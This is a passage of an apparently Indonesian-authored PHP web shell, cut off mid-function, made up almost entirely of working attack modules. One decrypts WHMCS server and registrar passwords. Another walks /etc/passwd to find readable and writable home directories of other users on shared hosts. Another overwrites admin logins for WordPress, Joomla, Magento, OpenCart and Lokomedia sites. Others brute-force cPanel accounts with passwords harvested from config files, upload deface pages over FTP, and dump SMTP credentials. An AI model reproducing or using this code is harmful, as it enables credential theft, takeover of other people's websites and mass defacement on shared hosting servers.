1172.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
1173.         $c += 2;
1174.     }
1175.     return $out;
1176. }
1177.  
1178. echo "
1179. <br>
1180.  
1181. <FORM method='post'>
1182. <input type='hidden' name='form_action' value='2'>
1183. <br>
1184. <table class=tabnet style=width:320px;padding:0 1px;>
1185. <tr><th colspan=2>WHMCS DECODER</th></tr>
1186. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
1187. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
1188. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
1189. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
1190. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
1191. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
1192. </table>
1193. </FORM>
1194. </center>
1195. ";
1196.  
1197.  if($_POST['form_action'] == 2 )
1198.  {
1199.  //include($file);
1200.  $db_host=($_POST['db_host']);
1201.  $db_username=($_POST['db_username']);
1202.  $db_password=($_POST['db_password']);
1203.  $db_name=($_POST['db_name']);
1204.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
1205.  
1206.  
1207.  
1208.     $link=mysql_connect($db_host,$db_username,$db_password) ;
1209.         mysql_select_db($db_name,$link) ;
1210. $query = mysql_query("SELECT * FROM tblservers");
1211. while($v = mysql_fetch_array($query)) {
1212. $ipaddress = $v['ipaddress'];
1213. $username = $v['username'];
1214. $type = $v['type'];
1215. $active = $v['active'];
1216. $hostname = $v['hostname'];
1217. echo("<center><table border='1'>");
1218. $password = decrypt ($v['password'], $cc_encryption_hash);
1219. echo("<tr><td>Type</td><td>$type</td></tr>");
1220. echo("<tr><td>Active</td><td>$active</td></tr>");
1221. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
1222. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
1223. echo("<tr><td>Username</td><td>$username</td></tr>");
1224. echo("<tr><td>Password</td><td>$password</td></tr>");
1225.  
1226. echo "</table><br><br></center>";
1227. }
1228.  
1229.     $link=mysql_connect($db_host,$db_username,$db_password) ;
1230.         mysql_select_db($db_name,$link) ;
1231. $query = mysql_query("SELECT * FROM tblregistrars");
1232. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
1233. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
1234. while($v = mysql_fetch_array($query)) {
1235. $registrar     = $v['registrar'];
1236. $setting = $v['setting'];
1237. $value = decrypt ($v['value'], $cc_encryption_hash);
1238. if ($value=="") {
1239. $value=0;
1240. }
1241. $password = decrypt ($v['password'], $cc_encryption_hash);
1242. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
1243. }
1244. }
1245.    
1246.  
1247. } elseif($_GET['do'] == 'jumping') {
1248.     $i = 0;
1249.     echo "<div class='margin: 5px auto;'>";
1250.     if(preg_match("/hsphere/", $dir)) {
1251.         $urls = explode("\r\n", $_POST['url']);
1252.         if(isset($_POST['jump'])) {
1253.             echo "<pre>";
1254.             foreach($urls as $url) {
1255.                 $url = str_replace(array("http://","www."), "", strtolower($url));
1256.                 $etc = "/etc/passwd";
1257.                 $f = fopen($etc,"r");
1258.                 while($gets = fgets($f)) {
1259.                     $pecah = explode(":", $gets);
1260.                     $user = $pecah[0];
1261.                     $dir_user = "/hsphere/local/home/$user";
1262.                     if(is_dir($dir_user) === true) {
1263.                         $url_user = $dir_user."/".$url;
1264.                         if(is_readable($url_user)) {
1265.                             $i++;
1266.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1267.                             if(is_writable($url_user)) {
1268.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1269.                             }
1270.                             echo $jrw."<br>";
1271.                         }
1272.                     }
1273.                 }
1274.             }
1275.         if($i == 0) {
1276.         } else {
1277.             echo "<br>Total ada ".$i." Kamar di ".$ip;
1278.         }
1279.         echo "</pre>";
1280.         } else {
1281.             echo '<center>
1282.                   <form method="post">
1283.                   List Domains: <br>
1284.                   <textarea name="url" style="width: 500px; height: 250px;">';
1285.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
1286.             while($getss = fgets($fp)) {
1287.                 echo $getss;
1288.             }
1289.             echo  '</textarea><br>
1290.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1291.                   </form></center>';
1292.         }
1293.     } elseif(preg_match("/vhosts/", $dir)) {
1294.         $urls = explode("\r\n", $_POST['url']);
1295.         if(isset($_POST['jump'])) {
1296.             echo "<pre>";
1297.             foreach($urls as $url) {
1298.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
1299.                 if(is_dir($web_vh) === true) {
1300.                     if(is_readable($web_vh)) {
1301.                         $i++;
1302.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1303.                         if(is_writable($web_vh)) {
1304.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1305.                         }
1306.                         echo $jrw."<br>";
1307.                     }
1308.                 }
1309.             }
1310.         if($i == 0) {
1311.         } else {
1312.             echo "<br>Total ada ".$i." Kamar di ".$ip;
1313.         }
1314.         echo "</pre>";
1315.         } else {
1316.             echo '<center>
1317.                   <form method="post">
1318.                   List Domains: <br>
1319.                   <textarea name="url" style="width: 500px; height: 250px;">';
1320.                   bing("ip:$ip");
1321.             echo  '</textarea><br>
1322.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1323.                   </form></center>';
1324.         }
1325.     } else {
1326.         echo "<pre>";
1327.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
1328.         while($passwd = fgets($etc)) {
1329.             if($passwd == '' || !$etc) {
1330.                 echo "<font color=red>Can't read /etc/passwd</font>";
1331.             } else {
1332.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1333.                 foreach($user_jumping[1] as $user_idx_jump) {
1334.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
1335.                     if(is_readable($user_jumping_dir)) {
1336.                         $i++;
1337.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1338.                         if(is_writable($user_jumping_dir)) {
1339.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1340.                         }
1341.                         echo $jrw;
1342.                         if(function_exists('posix_getpwuid')) {
1343.                             $domain_jump = file_get_contents("/etc/named.conf");   
1344.                             if($domain_jump == '') {
1345.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
1346.                             } else {
1347.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1348.                                 foreach($domains_jump[1] as $dj) {
1349.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1350.                                     $user_jumping_url = $user_jumping_url['name'];
1351.                                     if($user_jumping_url == $user_idx_jump) {
1352.                                         echo " => ( <u>$dj</u> )<br>";
1353.                                         break;
1354.                                     }
1355.                                 }
1356.                             }
1357.                         } else {
1358.                             echo "<br>";
1359.                         }
1360.                     }
1361.                 }
1362.             }
1363.         }
1364.         if($i == 0) {
1365.         } else {
1366.             echo "<br>Total ada ".$i." Kamar di ".$ip;
1367.         }
1368.         echo "</pre>";
1369.     }
1370.     echo "</div>";
1371.  
1372. } elseif($_GET['do'] == 'auto_edit_user') {
1373.     if($_POST['hajar']) {
1374.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1375.             echo "username atau password harus lebih dari 6 karakter";
1376.         } else {
1377.             $user_baru = $_POST['user_baru'];
1378.             $pass_baru = md5($_POST['pass_baru']);
1379.             $conf = $_POST['config_dir'];
1380.             $scan_conf = scandir($conf);
1381.             foreach($scan_conf as $file_conf) {
1382.                 if(!is_file("$conf/$file_conf")) continue;
1383.                 $config = file_get_contents("$conf/$file_conf");
1384.                 if(preg_match("/JConfig|joomla/",$config)) {
1385.                     $dbhost = ambilkata($config,"host = '","'");
1386.                     $dbuser = ambilkata($config,"user = '","'");
1387.                     $dbpass = ambilkata($config,"password = '","'");
1388.                     $dbname = ambilkata($config,"db = '","'");
1389.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
1390.                     $prefix = $dbprefix."users";
1391.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1392.                     $db = mysql_select_db($dbname);
1393.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1394.                     $result = mysql_fetch_array($q);
1395.                     $id = $result['id'];
1396.                     $site = ambilkata($config,"sitename = '","'");
1397.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1398.                     echo "Config => ".$file_conf."<br>";
1399.                     echo "CMS => Joomla<br>";
1400.                     if($site == '') {
1401.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1402.                     } else {
1403.                         echo "Sitename => $site<br>";
1404.                     }
1405.                     if(!$update OR !$conn OR !$db) {
1406.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1407.                     } else {
1408.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1409.                     }
1410.                     mysql_close($conn);
1411.                 } elseif(preg_match("/WordPress/",$config)) {
1412.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
1413.                     $dbuser = ambilkata($config,"DB_USER', '","'");
1414.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1415.                     $dbname = ambilkata($config,"DB_NAME', '","'");
1416.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
1417.                     $prefix = $dbprefix."users";
1418.                     $option = $dbprefix."options";
1419.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1420.                     $db = mysql_select_db($dbname);
1421.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1422.                     $result = mysql_fetch_array($q);
1423.                     $id = $result[ID];
1424.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1425.                     $result2 = mysql_fetch_array($q2);
1426.                     $target = $result2[option_value];
1427.                     if($target == '') {
1428.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1429.                     } else {
1430.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1431.                     }
1432.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1433.                     echo "Config => ".$file_conf."<br>";
1434.                     echo "CMS => Wordpress<br>";
1435.                     echo $url_target;
1436.                     if(!$update OR !$conn OR !$db) {
1437.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1438.                     } else {
1439.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1440.                     }
1441.                     mysql_close($conn);
1442.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1443.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1444.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1445.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1446.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1447.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1448.                     $prefix = $dbprefix."admin_user";
1449.                     $option = $dbprefix."core_config_data";
1450.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1451.                     $db = mysql_select_db($dbname);
1452.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1453.                     $result = mysql_fetch_array($q);
1454.                     $id = $result[user_id];
1455.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1456.                     $result2 = mysql_fetch_array($q2);
1457.                     $target = $result2[value];
1458.                     if($target == '') {
1459.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1460.                     } else {
1461.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1462.                     }
1463.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1464.                     echo "Config => ".$file_conf."<br>";
1465.                     echo "CMS => Magento<br>";
1466.                     echo $url_target;
1467.                     if(!$update OR !$conn OR !$db) {
1468.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1469.                     } else {
1470.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1471.                     }
1472.                     mysql_close($conn);
1473.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1474.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1475.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1476.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1477.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1478.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1479.                     $prefix = $dbprefix."user";
1480.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1481.                     $db = mysql_select_db($dbname);
1482.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1483.                     $result = mysql_fetch_array($q);
1484.                     $id = $result[user_id];
1485.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
1486.                     if($target == '') {
1487.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1488.                     } else {
1489.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1490.                     }
1491.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1492.                     echo "Config => ".$file_conf."<br>";
1493.                     echo "CMS => OpenCart<br>";
1494.                     echo $url_target;
1495.                     if(!$update OR !$conn OR !$db) {
1496.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1497.                     } else {
1498.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1499.                     }
1500.                     mysql_close($conn);
1501.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1502.                     $dbhost = ambilkata($config,'server = "','"');
1503.                     $dbuser = ambilkata($config,'username = "','"');
1504.                     $dbpass = ambilkata($config,'password = "','"');
1505.                     $dbname = ambilkata($config,'database = "','"');
1506.                     $prefix = "users";
1507.                     $option = "identitas";
1508.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1509.                     $db = mysql_select_db($dbname);
1510.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1511.                     $result = mysql_fetch_array($q);
1512.                     $target = $result[alamat_website];
1513.                     if($target == '') {
1514.                         $target2 = $result[url];
1515.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1516.                         if($target2 == '') {
1517.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1518.                         } else {
1519.                             $cek_login3 = file_get_contents("$target2/adminweb/");
1520.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1521.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1522.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1523.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1524.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1525.                             } else {
1526.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1527.                             }
1528.                         }
1529.                     } else {
1530.                         $cek_login = file_get_contents("$target/adminweb/");
1531.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1532.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1533.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1534.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1535.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1536.                         } else {
1537.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1538.                         }
1539.                     }
1540.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1541.                     echo "Config => ".$file_conf."<br>";
1542.                     echo "CMS => Lokomedia<br>";
1543.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1544.                         echo $url_target2;
1545.                     } else {
1546.                         echo $url_target;
1547.                     }
1548.                     if(!$update OR !$conn OR !$db) {
1549.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1550.                     } else {
1551.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1552.                     }
1553.                     mysql_close($conn);
1554.                 }
1555.             }
1556.         }
1557.     } else {
1558.         echo "<center>
1559.         <h1>Auto Edit User Config</h1>
1560.         <form method='post'>
1561.         DIR Config: <br>
1562.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1563.         Set User & Pass: <br>
1564.         <input type='text' name='user_baru' value='42247551N5' placeholder='user_baru'><br>
1565.         <input type='text' name='pass_baru' value='42247551N5' placeholder='pass_baru'><br>
1566.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1567.         </form>
1568. <br>
1569.         ";
1570.     }
1571. } elseif($_GET['do'] == 'cpanel') {
1572.     if($_POST['crack']) {
1573.         $usercp = explode("\r\n", $_POST['user_cp']);
1574.         $passcp = explode("\r\n", $_POST['pass_cp']);
1575.         $i = 0;
1576.         foreach($usercp as $ucp) {
1577.             foreach($passcp as $pcp) {
1578.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1579.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1580.                     } else {
1581.                         $_SESSION[$ucp] = "1";
1582.                         $_SESSION[$pcp] = "1";
1583.                         if($ucp == '' || $pcp == '') {
1584.                            
1585.                         } else {
1586.                             $i++;
1587.                             if(function_exists('posix_getpwuid')) {
1588.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
1589.                                 if($domain_cp == '') {
1590.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
1591.                                 } else {
1592.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1593.                                     foreach($domains_cp[1] as $dj) {
1594.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1595.                                         $user_cp_url = $user_cp_url['name'];
1596.                                         if($user_cp_url == $ucp) {
1597.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1598.                                             break;
1599.                                         }
1600.                                     }
1601.                                 }
1602.                             } else {
1603.                                 $dom = "<font color=red>function is Disable by system</font>";
1604.                             }
1605.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
1606.                         }
1607.                     }
1608.                 }
1609.             }
1610.         }
1611.         if($i == 0) {
1612.         } else {
1613.             echo "<br>Succes Crack ".$i." Cpanel";
1614.         }
1615.     } else {
1616.         echo "<center>
1617.         <form method='post'>
1618.         USER: <br>
1619.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1620.         $_usercp = fopen("/etc/passwd","r");
1621.         while($getu = fgets($_usercp)) {
1622.             if($getu == '' || !$_usercp) {
1623.                 echo "<font color=red>Can't read /etc/passwd</font>";
1624.             } else {
1625.                 preg_match_all("/(.*?):x:/", $getu, $u);
1626.                 foreach($u[1] as $user_cp) {
1627.                         if(is_dir("/home/$user_cp/public_html")) {
1628.                             echo "$user_cp\n";
1629.                     }
1630.                 }
1631.             }
1632.         }
1633.         echo "</textarea><br>
1634.         PASS: <br>
1635.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1636.         function cp_pass($dir) {
1637.             $pass = "";
1638.             $dira = scandir($dir);
1639.             foreach($dira as $dirb) {
1640.                 if(!is_file("$dir/$dirb")) continue;
1641.                 $ambil = file_get_contents("$dir/$dirb");
1642.                 if(preg_match("/WordPress/", $ambil)) {
1643.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1644.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1645.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1646.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1647.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1648.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1649.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1650.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1651.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1652.                 } elseif(preg_match("/^[client]$/", $ambil)) {
1653.                     preg_match("/password=(.*?)/", $ambil, $pass1);
1654.                     if(preg_match('/"/', $pass1[1])) {
1655.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1656.                         $pass .= $pass1[1]."\n";
1657.                     } else {
1658.                         $pass .= $pass1[1]."\n";
1659.                     }
1660.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1661.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1662.                 }
1663.             }
1664.             echo $pass;
1665.         }
1666.         $cp_pass = cp_pass($dir);
1667.         echo $cp_pass;
1668.         echo "</textarea><br>
1669.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1670.         </form>
1671. <br></center>";
1672.     }
1673. } elseif($_GET['do'] == 'cpftp_auto') {
1674.     if($_POST['crack']) {
1675.         $usercp = explode("\r\n", $_POST['user_cp']);
1676.         $passcp = explode("\r\n", $_POST['pass_cp']);
1677.         $i = 0;
1678.         foreach($usercp as $ucp) {
1679.             foreach($passcp as $pcp) {
1680.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1681.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1682.                     } else {
1683.                         $_SESSION[$ucp] = "1";
1684.                         $_SESSION[$pcp] = "1";
1685.                         if($ucp == '' || $pcp == '') {
1686.                             //
1687.                         } else {
1688.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1689.                             $ftp_conn = ftp_connect($ip);
1690.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1691.                             if((!$ftp_login) || (!$ftp_conn)) {
1692.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
1693.                             } else {
1694.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
1695.                                 $fi = htmlspecialchars($_POST['file_deface']);
1696.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1697.                                 if($deface) {
1698.                                     $i++;
1699.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
1700.                                     if(function_exists('posix_getpwuid')) {
1701.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
1702.                                         if($domain_cp == '') {
1703.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1704.                                         } else {
1705.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1706.                                             foreach($domains_cp[1] as $dj) {
1707.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1708.                                                 $user_cp_url = $user_cp_url['name'];
1709.                                                 if($user_cp_url == $ucp) {
1710.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1711.                                                     break;
1712.                                                 }
1713.                                             }
1714.                                         }
1715.                                     } else {
1716.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1717.                                     }
1718.                                 } else {
1719.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
1720.                                 }
1721.                             }
1722.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1723.                         }
1724.                     }
1725.                 }
1726.             }
1727.         }
1728.         if($i == 0) {
1729.         } else {
1730.             echo "<br>Success Deface ".$i." Cpanel";
1731.         }
1732.     } else {
1733.         echo "<center>
1734.         <form method='post'>
1735.         Filename: <br>
1736.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1737.         Deface Page: <br>
1738.         <input type='text' name='deface' placeholder='http://wget.yu.tl/files/lol.css' style='width: 450px;'><br>
1739.         USER: <br>
1740.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1741.         $_usercp = fopen("/etc/passwd","r");
1742.         while($getu = fgets($_usercp)) {
1743.             if($getu == '' || !$_usercp) {
1744.                 echo "<font color=red>Can't read /etc/passwd</font>";
1745.             } else {
1746.                 preg_match_all("/(.*?):x:/", $getu, $u);
1747.                 foreach($u[1] as $user_cp) {
1748.                         if(is_dir("/home/$user_cp/public_html")) {
1749.                             echo "$user_cp\n";
1750.                     }
1751.                 }
1752.             }
1753.         }
1754.         echo "</textarea><br>
1755.         PASS: <br>
1756.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1757.         function cp_pass($dir) {
1758.             $pass = "";
1759.             $dira = scandir($dir);
1760.             foreach($dira as $dirb) {
1761.                 if(!is_file("$dir/$dirb")) continue;
1762.                 $ambil = file_get_contents("$dir/$dirb");
1763.                 if(preg_match("/WordPress/", $ambil)) {
1764.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1765.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1766.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1767.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1768.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1769.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1770.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1771.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1772.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1773.                 } elseif(preg_match("/client/", $ambil)) {
1774.                     preg_match("/password=(.*)/", $ambil, $pass1);
1775.                     if(preg_match('/"/', $pass1[1])) {
1776.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1777.                         $pass .= $pass1[1]."\n";
1778.                     }
1779.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1780.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1781.                 }
1782.             }
1783.             echo $pass;
1784.         }
1785.         $cp_pass = cp_pass($dir);
1786.         echo $cp_pass;
1787.         echo "</textarea><br>
1788.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1789.         </form>
1790. <br></center>";
1791.     }
1792. } elseif($_GET['do'] == 'smtp') {
1793.     echo "<br>";
1794.     function scj($dir) {
1795.         $dira = scandir($dir);
1796.         foreach($dira as $dirb) {
1797.             if(!is_file("$dir/$dirb")) continue;
1798.             $ambil = file_get_contents("$dir/$dirb");
1799.             $ambil = str_replace("$", "", $ambil);
1800.             if(preg_match("/JConfig|joomla/", $ambil)) {
1801.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1802.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1803.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1804.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1805.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1806.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1807.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1808.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1809.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1810.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1811.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1812.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1813.             }
1814.         }
1815.     }
1816.     $smpt_hunter = scj($dir);
1817.     echo $smpt_hunter;
1818. } elseif($_GET['do'] == 'auto_wp') {
1819.     if($_POST['hajar']) {
1820.         $title = htmlspecialchars($_POST['new_title']);
1821.         $pn_title = str_replace(" ", "-", $title);
1822.         if($_POST['cek_edit'] == "Y") {
1823.             $script = $_POST['edit_content'];
1824.         } else {
1825.             $script = $title;
1826.         }
1827.         $conf = $_POST['config_dir'];
1828.         $scan_conf = scandir($conf);
1829.         foreach($scan_conf as $file_conf) {
1830.             if(!is_file("$conf/$file_conf")) continue;
1831.             $config = file_get_contents("$conf/$file_conf");
1832.             if(preg_match("/WordPress/", $config)) {
1833.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
1834.                 $dbuser = ambilkata($config,"DB_USER', '","'");
